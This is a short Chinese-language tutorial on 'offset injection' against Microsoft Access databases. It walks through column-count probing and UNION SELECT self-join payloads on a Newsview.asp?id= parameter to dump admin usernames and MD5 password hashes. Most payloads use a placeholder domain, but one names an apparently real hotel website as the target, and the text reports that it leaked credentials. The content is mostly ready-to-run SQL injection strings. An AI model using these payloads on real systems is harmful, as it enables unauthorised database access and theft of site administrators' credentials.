ACCESS 偏移注入记录
Access偏移注入原理,基本公式为:
order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案;
也就是:
order by = 22
* = 6个字符
2 × * = 12个字符
22 - 12 = 10个字符
注入点:
查询字段数:
www.xxx.com/Newsview.asp?id=832 order by 16 回显正常
www.xxx.com/Newsview.asp?id=832 order by 17 回显错误
联合查询:
www.xxx.com/Newsview.asp?id=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
获得回显点:
不过不知道字段名,工具只能爆破出两个分别为:admin_name,admin_id,我们借助access的偏移注入获取更多信息。
得到admin的字段数(通过用“*”号替换数字,不断向前进位,查看回显页面是否正常):
这里可以知道admin的字段数为:16-11 = 5 ,所以 admin里面有5个字段。
接下来进行主题,偏移注入:
偏移注入的基本公式为:order by 出的字段数-*号的字段数x2。这里是16-5*2=6,那么开始构造payload:
http://www.ronghuhotel.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_id=b.admin_id)
可以看到直接爆出 用户和md5加密密码。
我们可以尝试改变语句获得更多信息,因为偏移注入获得的内容是随机的, 打乱信息组合。
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,a.admin_name,b.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,a.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,b.admin_name,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
...
还有很多,还可以把admin_name改为admin_id。
这些都是一级偏移:
http://www.xxx.com/Newsview.asp?id=-832 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.admin_name=b.admin_name)
二级偏移:
union select 1,a.id,b.id,c.id, * from ((admin as a inner join admin as bon a.admin_name =b.admin_name) inner join admin as c on a.admin_name =c.admin_name)
PS:偏移注入只适用于access数据库。